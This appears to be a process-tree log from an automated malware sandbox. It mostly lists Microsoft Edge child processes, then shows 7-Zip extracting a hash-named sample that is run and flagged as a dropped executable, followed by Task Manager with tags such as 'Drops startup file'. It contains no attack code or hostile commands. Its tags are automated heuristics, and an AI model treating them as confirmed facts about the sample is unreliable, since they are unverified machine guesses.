C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3504,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=3556 /prefetch:12⤵PID:3016
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3524,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=3540 /prefetch:12⤵PID:1652
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --always-read-main-dll --field-trial-handle=5068,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=5084 /prefetch:12⤵PID:4952
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --always-read-main-dll --field-trial-handle=4692,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=4888 /prefetch:12⤵PID:4572
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4848,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=5452 /prefetch:82⤵PID:3732
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5476,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=5536 /prefetch:82⤵PID:3028
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=PooledProcess2 --lang=en-US --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5472,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=5544 /prefetch:82⤵PID:1624
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5852,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=5860 /prefetch:82⤵PID:6088
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5852,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=5860 /prefetch:82⤵PID:4388
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6100,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=6460 /prefetch:82⤵PID:2900
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6104,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=6432 /prefetch:82⤵PID:4756
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6084,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=6484 /prefetch:82⤵PID:3976
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --always-read-main-dll --field-trial-handle=6132,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=2936 /prefetch:12⤵PID:1624
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --always-read-main-dll --field-trial-handle=5540,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=6524 /prefetch:12⤵PID:6088
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --lang=en-US --service-sandbox-type=collections --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5140,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=5284 /prefetch:82⤵PID:3692
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --always-read-main-dll --field-trial-handle=4904,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=5224 /prefetch:12⤵PID:4120
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5308,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=5036 /prefetch:82⤵PID:3268
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-US --service-sandbox-type=search_indexer --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6416,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=7084 /prefetch:82⤵PID:5100
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5264,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=5024 /prefetch:82⤵PID:2416
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5076,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=6676 /prefetch:82⤵PID:1256
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6668,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=1248 /prefetch:82⤵PID:2328
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.4355 --string-annotations --gpu-preferences=UAAAAAAAAADoAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAABCAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=3992,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=5796 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:4852
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --always-read-main-dll --field-trial-handle=5260,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=5796 /prefetch:12⤵PID:2296
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5132,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=6564 /prefetch:82⤵PID:2068
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=896,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=4856 /prefetch:82⤵PID:2288
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=3460,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=5396 /prefetch:82⤵PID:1292
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=2948,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=1856 /prefetch:82⤵PID:636
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5448,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=6592 /prefetch:82⤵PID:5088
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --always-read-main-dll --field-trial-handle=7064,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=5180 /prefetch:12⤵PID:3948
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4880,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=6432 /prefetch:82⤵PID:6000
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6644,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=6708 /prefetch:82⤵PID:3136
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=3236,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=6656 /prefetch:82⤵PID:3128
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --always-read-main-dll --field-trial-handle=5212,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=5868 /prefetch:12⤵PID:5008
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6596,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=6184 /prefetch:82⤵PID:5456
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5632,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=4032 /prefetch:82⤵PID:3996
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5872,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=5740 /prefetch:82⤵PID:3200
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5396,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=6652 /prefetch:82⤵PID:3612
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --always-read-main-dll --field-trial-handle=5716,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=3584 /prefetch:12⤵PID:1252
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=44 --always-read-main-dll --field-trial-handle=6636,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=4344 /prefetch:12⤵PID:6080
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5684,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=3528 /prefetch:82⤵PID:228
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6620,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=5024 /prefetch:82⤵PID:3704
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=47 --always-read-main-dll --field-trial-handle=6308,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=1352 /prefetch:12⤵PID:7672
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=48 --always-read-main-dll --field-trial-handle=4840,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=3376 /prefetch:12⤵PID:3696
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=49 --always-read-main-dll --field-trial-handle=6684,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=4212 /prefetch:12⤵PID:6428
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=3456,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=2988 /prefetch:82⤵PID:7412
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=51 --always-read-main-dll --field-trial-handle=5012,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=5616 /prefetch:12⤵PID:5812
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5424,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=6404 /prefetch:82⤵PID:1488
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=53 --always-read-main-dll --field-trial-handle=7356,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=4292 /prefetch:12⤵PID:29464
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=54 --always-read-main-dll --field-trial-handle=7468,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=5752 /prefetch:12⤵PID:29680
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=55 --always-read-main-dll --field-trial-handle=2924,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=7284 /prefetch:12⤵PID:13896
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6736,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=5860 /prefetch:82⤵PID:13912
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6208,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=7300 /prefetch:82⤵PID:13980
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=58 --always-read-main-dll --field-trial-handle=7472,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=6524 /prefetch:12⤵PID:548
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4668,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=4032 /prefetch:82⤵PID:7600
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=60 --always-read-main-dll --field-trial-handle=5708,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=6484 /prefetch:12⤵PID:15112
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5496,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=7220 /prefetch:82⤵PID:15124
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=62 --always-read-main-dll --field-trial-handle=6624,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=1248 /prefetch:12⤵PID:19500
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7544,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=5432 /prefetch:82⤵PID:19516
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"1⤵PID:2816
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start1⤵PID:356
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start2⤵PID:2212
-
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:5344
-
C:\Program Files\7-Zip\7zG.exe"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\eac7ea3969f4483a6f1ed27bad46dbb2f32c40be8f402e6e815d6917cd5731ac\" -ad -an -ai#7zMap23165:190:7zEvent44191⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:5436
-
C:\Users\Admin\Downloads\eac7ea3969f4483a6f1ed27bad46dbb2f32c40be8f402e6e815d6917cd5731ac\eac7ea3969f4483a6f1ed27bad46dbb2f32c40be8f402e6e815d6917cd5731ac.exe"C:\Users\Admin\Downloads\eac7ea3969f4483a6f1ed27bad46dbb2f32c40be8f402e6e815d6917cd5731ac\eac7ea3969f4483a6f1ed27bad46dbb2f32c40be8f402e6e815d6917cd5731ac.exe"1⤵
- Executes dropped EXE
PID:4496
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
- Drops startup file
- Modifies Internet Explorer settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
